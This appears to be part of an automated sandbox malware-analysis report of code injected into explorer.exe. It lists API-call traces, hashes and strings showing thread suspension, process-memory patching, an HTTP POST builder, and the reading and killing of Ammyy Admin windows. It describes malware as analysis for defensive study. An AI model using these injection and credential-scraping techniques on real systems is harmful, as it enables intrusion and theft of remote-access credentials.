                            • LoadLibraryA.KERNEL32(user32.dll), ref: 0057235B
                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0057238D
                            • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 005723A6
                            • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 005723BF
                            • GetProcAddress.KERNEL32(00000000,SystemParametersInfoW), ref: 00572374
                              • Part of subcall function 00571912: RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 0057194C
                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 005723D2
                            • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 005723E5
                            • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 005723FE
                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00572411
                            • Sleep.KERNEL32(000001F4), ref: 0057242E
                            • RtlExitUserThread.NTDLL(00000000), ref: 00572445
                            • ExitProcess.KERNEL32 ref: 0057244D
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: AddressProc$LibraryLoad$CurrentExitProcessThread$CloseCreateFirstHandleMemoryMoveSleepSnapshotThread32Toolhelp32User
                            • String ID: CreateFileW$MessageBoxA$MessageBoxW$MoveFileW$ShowWindow$SystemParametersInfoW$advapi32.dll$kernel32.dll$user32.dll
                            • API String ID: 408137310-2290992051
                            • Opcode ID: f730646c9f3c9e44763f6fd247eabcc8d488ca5a270c446df270b0ceefe96821
                            • Instruction ID: 9a6696823a786ab4ff448666ccd8dde1f2fa8a527a032e4ecf832e3c44f2cf7b
                            • Opcode Fuzzy Hash: f730646c9f3c9e44763f6fd247eabcc8d488ca5a270c446df270b0ceefe96821
                            • Instruction Fuzzy Hash: DD11A234780A21A7CA1133793C5EF6E2D92BBD4B01F50C414B20DA71E2DFA4CC867A29
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00571276: GetCurrentProcessId.KERNEL32 ref: 00571288
                              • Part of subcall function 00571276: GetCurrentThreadId.KERNEL32 ref: 00571290
                              • Part of subcall function 00571276: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 005712A0
                              • Part of subcall function 00571276: Thread32First.KERNEL32(00000000,0000001C), ref: 005712AE
                              • Part of subcall function 00571276: CloseHandle.KERNEL32(00000000), ref: 00571307
                            • LoadLibraryA.KERNEL32(user32.dll), ref: 0057235B
                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0057238D
                            • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 005723A6
                            • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 005723BF
                            • GetProcAddress.KERNEL32(00000000,SystemParametersInfoW), ref: 00572374
                              • Part of subcall function 00571912: RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 0057194C
                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 005723D2
                            • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 005723E5
                            • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 005723FE
                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00572411
                            • Sleep.KERNEL32(000001F4), ref: 0057242E
                            • RtlExitUserThread.NTDLL(00000000), ref: 00572445
                            • ExitProcess.KERNEL32 ref: 0057244D
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: AddressProc$LibraryLoad$CurrentExitProcessThread$CloseCreateFirstHandleMemoryMoveSleepSnapshotThread32Toolhelp32User
                            • String ID: CreateFileW$MessageBoxA$MessageBoxW$MoveFileW$ShowWindow$SystemParametersInfoW$advapi32.dll$kernel32.dll$user32.dll
                            • API String ID: 408137310-2290992051
                            • Opcode ID: 9f1375706ea8a561147553eae5c40fc63c1665e6441864b2802342ab18957e68
                            • Instruction ID: d03dbe9af45351d80f784a6c38355654bbc8a2a8bee4ded162f5d67c24158e4d
                            • Opcode Fuzzy Hash: 9f1375706ea8a561147553eae5c40fc63c1665e6441864b2802342ab18957e68
                            • Instruction Fuzzy Hash: 83118435780B11A7CB1133B93C5EB2E5D92BBD4B01F51C424B20DA75E3DFA4C8867A29
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • GetCurrentProcessId.KERNEL32 ref: 00571288
                            • GetCurrentThreadId.KERNEL32 ref: 00571290
                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 005712A0
                            • Thread32First.KERNEL32(00000000,0000001C), ref: 005712AE
                            • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 005712CD
                            • SuspendThread.KERNEL32(00000000), ref: 005712DD
                            • CloseHandle.KERNEL32(00000000), ref: 005712EC
                            • Thread32Next.KERNEL32(00000000,0000001C), ref: 005712FC
                            • CloseHandle.KERNEL32(00000000), ref: 00571307
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                            • String ID:
                            • API String ID: 1467098526-0
                            • Opcode ID: ed32e99c97216fdbaa5262047cf9a921b660b1a54fe4efdc7ed785f5f2dffb72
                            • Instruction ID: 4a7e5cb1b5693e89e18a83b9dbfab6721d2ac9cc6138de8d6be0ef7c08be3473
                            • Opcode Fuzzy Hash: ed32e99c97216fdbaa5262047cf9a921b660b1a54fe4efdc7ed785f5f2dffb72
                            • Instruction Fuzzy Hash: 75117C72409200EFD7119FA6BC0CA6F7EA8FB95701F054519F64AD6110D730898DBFAB
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00571000: GetProcessHeap.KERNEL32(00000008,?,0057134A,?,00000000,00000001,00000000,?), ref: 00571003
                              • Part of subcall function 00571000: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0057100A
                              • Part of subcall function 0057106C: lstrlen.KERNEL32(?,00000000,00000000,00000000,005714ED,00000000,772D81D0,?,?), ref: 00571074
                              • Part of subcall function 0057106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00571086
                              • Part of subcall function 00571364: RtlZeroMemory.NTDLL(?,00000018), ref: 00571377
                            • RtlZeroMemory.NTDLL(?,0000003C), ref: 00571548
                            • wsprintfW.USER32 ref: 00571685
                            • wsprintfW.USER32 ref: 005716F2
                            • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 005717B8
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                            • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                            • API String ID: 4204651544-1701262698
                            • Opcode ID: 9149e16273f4f889f393538da028c817a61daf039e5df65c9de16bf41d5743fa
                            • Instruction ID: 9436fe23584b88d473c9c736c8fda10909cbb8abc610782d8e2affc4fc58e42e
                            • Opcode Fuzzy Hash: 9149e16273f4f889f393538da028c817a61daf039e5df65c9de16bf41d5743fa
                            • Instruction Fuzzy Hash: C0A19E71608745AFD314AF68E848A2BBBE9FB98740F00892DF589C7251DB30DD84EF56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • WriteProcessMemory.KERNEL32(?,0040889C,?,00000001,00000000), ref: 00572043
                            • WriteProcessMemory.KERNEL32(?,004579F0,?,00000001,00000000), ref: 00572057
                            • WriteProcessMemory.KERNEL32(?,0044A2C2,?,00000001,00000000), ref: 0057206B
                            • WriteProcessMemory.KERNEL32(?,00449F61,?), ref: 00572087
                            • WriteProcessMemory.KERNEL32(?,00449F86,?,00000002,00000000), ref: 0057209E
                            • WriteProcessMemory.KERNEL32(?,0045CE34,00000003,00000001,00000000), ref: 005720B2
                            • WriteProcessMemory.KERNEL32(?,00451F52,?,00000001,00000000), ref: 005720C6
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID: t
                            • API String ID: 3559483778-2238339752
                            • Opcode ID: 6f05d1c89c13c50b6634f57e668d4be329e136677e76101e81e3413fdee5d7b3
                            • Instruction ID: 66e4f7ed48f7207f2cd16916ddb1af4bb4e471b576ba5418abc95766df8d878d
                            • Opcode Fuzzy Hash: 6f05d1c89c13c50b6634f57e668d4be329e136677e76101e81e3413fdee5d7b3
                            • Instruction Fuzzy Hash: 5711266014C3497BD211DA1A8C84D7FBFECEBC2A64F400A5FF9C4A21C1D758A90D8AB7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • FindWindowA.USER32(AmmyyAdmin3Main,00000000), ref: 00571FA0
                              • Part of subcall function 00571000: GetProcessHeap.KERNEL32(00000008,?,0057134A,?,00000000,00000001,00000000,?), ref: 00571003
                              • Part of subcall function 00571000: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0057100A
                            • GetDlgItemTextA.USER32(00000000,000005E7,00000000,00000104), ref: 00571FC5
                              • Part of subcall function 00571F5C: lstrlen.KERNEL32 ref: 00571F66
                              • Part of subcall function 00571F5C: lstrlen.KERNEL32 ref: 00571F81
                            • wsprintfA.USER32 ref: 00571FE6
                            • CreateThread.KERNEL32(?,?,Function_00000F0F,00576070), ref: 00571FF9
                            • CloseHandle.KERNEL32(00000000,?,?,Function_00000F0F,00576070), ref: 00572000
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: Heaplstrlen$AllocateCloseCreateFindHandleItemProcessTextThreadWindowwsprintf
                            • String ID: %s{:!:}-$AmmyyAdmin3Main$p`W
                            • API String ID: 4071220498-79966700
                            • Opcode ID: c7073e5a0487f295ac873e0d4d4e7cc39a002db8eb6331926f64ff0acb2dfd37
                            • Instruction ID: 674d15f839869a9ed5683b26c0e9da72dd616488c3b8d6f645789d78b2792757
                            • Opcode Fuzzy Hash: c7073e5a0487f295ac873e0d4d4e7cc39a002db8eb6331926f64ff0acb2dfd37
                            • Instruction Fuzzy Hash: D8F08CB1300600ABE7202B657C8CF3F2E1DFBA1B96B104028FA4E96181CB608C85FA75
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlMoveMemory.NTDLL(?,?,?), ref: 00571B8D
                            • LoadLibraryA.KERNEL32(?,005760DC,00000000,00000000,772EF560,00000000,00571DC3,?), ref: 00571BB5
                            • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00571BE2
                            • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00571C33
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                            • String ID:
                            • API String ID: 3827878703-0
                            • Opcode ID: f8b5d8393d1cc4663b36d69edc51984a62dd93ac1d3eae081b319af2bcdb316c
                            • Instruction ID: 84884fb045b47da6e0c7aaa86dbc91d49eeef474a9c1c3a3aaf8ecd38deb0c7d
                            • Opcode Fuzzy Hash: f8b5d8393d1cc4663b36d69edc51984a62dd93ac1d3eae081b319af2bcdb316c
                            • Instruction Fuzzy Hash: 1331A271200A169BCB18CF6DEC84B66BBA8BF15355B14852CE84ECB200E725EC45EBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00571000: GetProcessHeap.KERNEL32(00000008,?,0057134A,?,00000000,00000001,00000000,?), ref: 00571003
                              • Part of subcall function 00571000: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0057100A
                            • GetClassNameA.USER32(?,00000000,00000103), ref: 0057210A
                            • lstrcmpi.KERNEL32(00000000,AmmyyAdmin3SessionsList), ref: 00572116
                            Strings
                            • AmmyyAdmin3SessionsList, xrefs: 00572110
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: Heap$AllocateClassNameProcesslstrcmpi
                            • String ID: AmmyyAdmin3SessionsList
                            • API String ID: 3120313154-4023854077
                            • Opcode ID: 9b02448b1a524ebf812d6f5d3ecfbea541f71eaa140c7e1959c15fb7bf680f9f
                            • Instruction ID: 16910c0a123eaad7cbddb242667ae3ee1046b70b197843a49502dac08fa8f1a3
                            • Opcode Fuzzy Hash: 9b02448b1a524ebf812d6f5d3ecfbea541f71eaa140c7e1959c15fb7bf680f9f
                            • Instruction Fuzzy Hash: 08F0E531204621ABC7016B36BC0CA6F7EAAFFD0391F004428F24DC1160DB604C99BB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • FindWindowA.USER32(AmmyyAdmin3Main,00000000), ref: 00571246
                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00571259
                              • Part of subcall function 00571214: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,0057126B), ref: 0057121A
                              • Part of subcall function 00571214: TerminateProcess.KERNEL32(00000000,00000000), ref: 00571229
                              • Part of subcall function 00571214: CloseHandle.KERNEL32(00000000), ref: 00571230
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: Process$Window$CloseFindHandleOpenTerminateThread
                            • String ID: AmmyyAdmin3Main
                            • API String ID: 1658191309-632365155
                            • Opcode ID: 4752a9f8d9583e58a53b82100cada7cc50702afa210ea606ae5541ef182aaa0a
                            • Instruction ID: 412697bb2558417990b2ae0c00c38ddc89b29c89fc580b5858732423fc984024
                            • Opcode Fuzzy Hash: 4752a9f8d9583e58a53b82100cada7cc50702afa210ea606ae5541ef182aaa0a
                            • Instruction Fuzzy Hash: 6DE0D839A10614ABDB24EB9AFC09BBE7B2CFB10711F004048E90DD20419B605D40F6E5
                            Uniqueness

                            Uniqueness Score: -1.00%